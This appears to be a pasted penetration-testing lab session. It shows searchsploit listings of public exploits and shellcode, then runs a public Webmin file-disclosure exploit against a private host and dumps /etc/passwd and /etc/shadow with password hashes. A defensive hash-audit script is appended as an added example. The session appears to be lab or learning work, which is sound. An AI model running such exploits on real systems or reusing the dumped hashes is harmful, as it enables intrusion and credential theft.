TCP TIMESTAMPS Denial of Service Exploit    /multiple/dos/1008.c
Tcpdump bgp_update_print Remote Denial of Service Exploit    /multiple/dos/1037.c
TCP-IP Datalook <= 1.3 Local Denial of Service Exploit    /windows/dos/1067.cpp
TCP Chat (TCPX) 1.0 Denial of Service Exploit    /windows/dos/1090.cpp
Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit    /multiple/dos/1213.c
Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit    /hardware/dos/1338.pl
panic-reloaded TCP Denial of Service Tool    /multiple/dos/1671.c
MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit    /windows/dos/1967.c
Dart Communications PowerTCP Service Control Remote BoF Exploit    /windows/remote/3982.html
Dart Communications PowerTCP ZIP Compression Remote BoF Exploit    /windows/remote/3984.html
Dart Communications PowerTCP FTP module Remote BOF Exploit    /windows/remote/6793.html
PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)    /windows/remote/6840.html
Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)    /multiple/dos/7555.py
Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets    /hardware/dos/8393.txt
TCPDB 3.8 Arbitrary Add Admin Account Vulnerability    /php/webapps/8626.txt
Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash Vulnerability    /multiple/dos/8695.txt
Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)    /windows/remote/8934.py
TCPDB 3.8 Remote Content Change Bypass Vulnerabilities    /php/webapps/9512.txt
linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes    /lin/x86/shellcode/13308.c
linux/x86 listens for shellcode on tcp/5555 and jumps to it    /lin/x86/shellcode/13309.asm
linux/x86 TCP Proxy Shellcode 236 bytes    /lin/x86/shellcode/13381.c
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes    /lin/x86/shellcode/13387.c
linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes    /lin/x86/shellcode/13388.c
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes    /lin/x86/shellcode/13393.c
solaris/x86 portbind/tcp shellcode generator    /solaris/x86/shellcode/13498.php
PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability    /php/webapps/14086.txt
Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC    /windows/dos/16040.py
CA BrightStor Discovery Service TCP Overflow    /windows/remote/16408.rb
Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)    /windows/remote/16748.rb
Zabbix Agent net.tcp.listen Command Injection    /freebsd/remote/16918.rb
Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS    /linux/dos/16952.c
Progea Movicon 11 TCPUploadServer Remote Exploit    /windows/remote/17034.py
OSX/Intel reverse_tcp shell x86_64 - 131 bytes    /osX/shellcode/17224.s
MS11-064 TCP/IP Stack Denial of Service    /windows/dos/17981.py
root@bt:/pentest/exploits/exploitdb# ./searchsploit httpd
Description    Path
----------------------------------------------------------------------------------------------------
Apache HTTPd Arbitrary Long HTTP Headers DoS    /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)    /linux/dos/371.c
Sumus 0.2.2 httpd Remote Buffer Overflow Exploit    /linux/remote/940.c
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS    /linux/dos/1746.pl
RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit    /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit    /windows/remote/2482.pl
corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit    /linux/remote/4243.c
EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method    /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit    /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC    /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit    /linux/remote/4437.c
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities    /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities    /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit    /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit    /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability    /multiple/remote/5215.txt
VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit    /windows/remote/5519.c
Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC    /hardware/dos/6394.pl
fhttpd 0.4.2 un64() Remote Denial of Service Exploit    /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit    /hardware/dos/7535.php
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln    /windows/remote/7762.html
SW-HTTPD Server 0.x Remote Denial of Service Exploit    /multiple/dos/8245.c
httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities    /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)    /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)    /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)    /multiple/remote/8786.txt
httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit    /windows/remote/8897.c
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit    /windows/dos/9657.pl
httpdx <= 1.4.6b source disclosure    /windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF    /windows/remote/9886.txt
httpdx 1.4 Get Request Buffer Overflow    /windows/remote/10053.txt
OrzHTTPd Format String Exploit    /linux/remote/10282.py
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)    /windows/dos/11343.py
RCA DCM425 Cable Modem micro_httpd DoS/PoC    /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)    /windows/dos/11734.py
Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC    /hardware/dos/13774.pl
Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC    /windows/dos/14683.py
httpdASM 0.92 Directory Traversal    /windows/remote/15861.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download    /windows/remote/16075.pl
HTTPDX tolog() Function Format String Vulnerability    /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)    /win32/remote/16759.rb
HTTPDX tolog() Function Format String Vulnerability    /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer Overflow    /windows/remote/16799.rb
jHTTPd 0.1a Directory Traversal Vulnerability    /multiple/remote/17068.py
Simple HTTPd 1.42 Denial of Servive Exploit    /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability    /windows/remote/17669.py
Apache httpd Remote Denial of Service (memory exhaustion)    /multiple/dos/17696.pl
FleaHttpd Remote Denial Of Service Exploit    /linux/dos/18120.py
lighttpd Denial of Service Vulnerability PoC    /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description    Path
----------------------------------------------------------------------------------------------------
Webmin BruteForce and Command Execution Exploit    /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)    /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5    /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit    /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)    /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability    /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability    /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities    /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities    /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities    /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 705.pl 192.168.0.21:10000
Webmin BruteForcer
usage:
705.pl <host> <command>
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 706.pl 192.168.0.21:10000
Can't open perl script "706.pl": No such file or directory
root@bt:/pentest/exploits/exploitdb/platforms/multiple# cd remote/
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21:10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21:10000 /etc/psswd
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/psswd
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/passwd
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 shadw 10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 shadow 10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
passwd = original file
shadow = password protection system
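
The split between the two files noted above, as an added example that is not part of the original post: passwd is world-readable and carries only an `x` placeholder, the hashes live in shadow, and the `$1$` prefix on the entries dumped above marks MD5-crypt. The sketch below audits a passwd/shadow pair for weak or unshadowed hashes; the account names, hash strings and the helper names `hash_scheme` and `audit` are constructed for illustration.

```python
# Added example (not from the original post): audit a passwd/shadow pair.
# All account names and hash strings below are constructed placeholders.
SCHEMES = {"1": "MD5-crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "SHA-256-crypt", "6": "SHA-512-crypt", "y": "yescrypt"}
FLAGGED = {"MD5-crypt", "DES-crypt", "empty", "unknown"}

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1001:1001::/home/alice:/bin/bash
bob:x:1002:1002::/home/bob:/bin/bash
legacy:AAconstructed:1003:1003::/home/legacy:/bin/sh
"""
SHADOW = """\
root:$1$CONSTRUC$constructedplaceholder:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
alice:$6$CONSTRUCTED$constructedplaceholder:19000:0:99999:7:::
bob::19000:0:99999:7:::
"""

def hash_scheme(field):
    """Classify the password field of a passwd or shadow entry."""
    if field == "":
        return "empty"                 # login needs no password
    if field[0] in "*!":
        return "locked"                # password login disabled
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], "unknown")
    return "DES-crypt"                 # traditional 13-character hash

def audit(passwd_text, shadow_text):
    """Map each passwd account to (scheme, verdict)."""
    shadow = {}
    for line in shadow_text.strip().splitlines():
        fields = line.split(":")
        shadow[fields[0]] = fields[1]
    report = {}
    for line in passwd_text.strip().splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue                   # malformed passwd entry
        name, pw = fields[0], fields[1]
        if pw != "x":                  # hash kept in world-readable passwd
            report[name] = (hash_scheme(pw), "not shadowed")
        else:                          # "x": hash is in shadow; missing = locked
            scheme = hash_scheme(shadow.get(name, "*"))
            report[name] = (scheme, "flag" if scheme in FLAGGED else "ok")
    return report

if __name__ == "__main__":
    for name, (scheme, verdict) in audit(PASSWD, SHADOW).items():
        print(f"{name:8} {scheme:14} {verdict}")
```

Accounts reported as `flag` or `not shadowed` are the ones to re-hash with a modern scheme or lock.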